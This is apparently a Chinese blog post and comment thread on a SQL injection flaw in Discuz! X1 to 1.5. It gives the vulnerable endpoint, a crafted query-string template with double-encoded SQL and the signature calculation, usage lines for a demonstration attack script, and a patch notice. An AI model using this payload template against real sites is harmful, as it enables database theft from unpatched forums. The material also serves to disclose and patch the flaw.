受影响的版本:
Discuz! X1~1.5
攻击方式:
向/api/trade/notify_credit.php提交一组经过特殊处理的query string
attach=tenpay&retcode=0&trade_no=%2527&mch_vno=[SQL语句两次encode]&sign=[计算“attach=tenpay&mch_vno=[SQL语句]&retcode=0&key=”MD5值]
补丁:请及时安装最新补丁或升级至X2
演示脚本【请注意此脚本具有一定攻击性】
还需要安装PHP环境,请到windows.php.net/download下载zip包或安装包[建议使用绿色的zip方式]
使用方法:php show.php 目标网站 [数据库表头,可选]
举例:
php show.php http://localhost/
php show.php http://localhost/ xss_
评论
先抢个沙发?
SOHO一族的最新文章:PaidSurveysLive-RewardingWays-沙丁鱼收款755刀2RMB
看不懂…… :youyisi
注入漏洞很可怕,想起当初的 0==0那个漏洞了。。
の店舗